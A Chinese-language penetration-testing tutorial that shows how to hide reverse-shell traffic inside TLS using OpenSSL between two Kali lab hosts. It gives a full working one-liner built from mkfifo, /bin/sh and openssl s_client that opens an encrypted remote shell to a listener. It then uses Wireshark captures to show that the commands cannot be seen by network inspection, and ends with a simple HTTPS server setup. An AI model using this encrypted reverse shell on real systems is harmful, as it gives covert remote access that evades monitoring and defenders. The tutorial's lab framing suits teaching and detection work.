流量加密之OpenSSL反弹加密

目录

1、OpenSSL 简介

2、使用 OpenSSL 反弹加密 shell

3、使用wireshark抓包验证

4、搭建 HTTPS Server


1、OpenSSL 简介

OpenSSL 是一个强大的、商业级的、功能齐全的开源工具包,用于 TLS(以前称为 SSL)、DTLS 和 QUIC(目前仅限客户端)协议,协议实现基于全功能通用加密库,也可以单独使用,还包括一个加密模块经过验证,符合 FIPS 标准,是一个安全套接字层密码库,囊括主要的密码算法、常用密钥、证书封装管理功能,主要用于实现ssl协议。

流量加密之OpenSSL反弹加密_第1张图片

2、使用 OpenSSL 反弹加密 shell

以 Linux 环境为例,测试主机为两台 kali

kali A 的IP为:192.168.249.128

kali B 的IP为:192.168.249.132

假设我们从 A 主机反弹 shell 到 B 主机

首先我们需要在B主机上使用 OpenSSL 生成自签名证书,证书有效期为一年

执行如下命令:

openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes

这里我新建了一个目录 test 便于观察生成的文件 

流量加密之OpenSSL反弹加密_第2张图片

生成过程中会询问我们一些信息,都可以不用填写直接回车

流量加密之OpenSSL反弹加密_第3张图片

ls可以看到生成了两个文件:cert.pem 和 key.pem 

流量加密之OpenSSL反弹加密_第4张图片

利用生成的自签名证书(cert.pem和key.pem )

在 B 主机上使用 OpenSSL 开启端口监听,这里使用 1337 端口启动一个 SSL/TLS server

执行如下命令:

openssl s_server -quiet -key key.pem -cert cert.pem -port 1337

 此时在主机 A 执行如下命令,IP 为主机 B 的 IP:

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.249.132:1337 > /tmp/s; rm /tmp/s

流量加密之OpenSSL反弹加密_第5张图片

此时观察主机 B 

反弹shell成功

流量加密之OpenSSL反弹加密_第6张图片

执行一些命令试试

流量加密之OpenSSL反弹加密_第7张图片

3、使用wireshark抓包验证

进入eth0,开启抓包

流量加密之OpenSSL反弹加密_第8张图片

在主机 B 执行一些命令(我这里执行的是ls、whoami、ifconfig)

流量加密之OpenSSL反弹加密_第9张图片

观察wireshark抓包内容

无敏感信息泄露

流量加密之OpenSSL反弹加密_第10张图片

追踪TCP流

看不出什么

流量加密之OpenSSL反弹加密_第11张图片

追踪TLS流

看不到任何内容

流量加密之OpenSSL反弹加密_第12张图片

主机 A 和主机 B 之间在使用 TLS1.2 协议进行加密通信,因此无法看到执行的命令和返回信息。

4、搭建 HTTPS Server

我们也可以使用生成的自签名证书(cert.pem和key.pem )搭建 HTTPS Server )

命令如下:

openssl s_server -key key.pem -cert cert.pem -accept 44444 -WWW

在 44444 端口启动一个 HTTPS 服务

(这里做了一个首页文件index.html)

流量加密之OpenSSL反弹加密_第13张图片

可以正常访问到,并且使用的是https

流量加密之OpenSSL反弹加密_第14张图片

你可能感兴趣的:(内网渗透,web,https,web安全,ssl,linux,wireshark,web)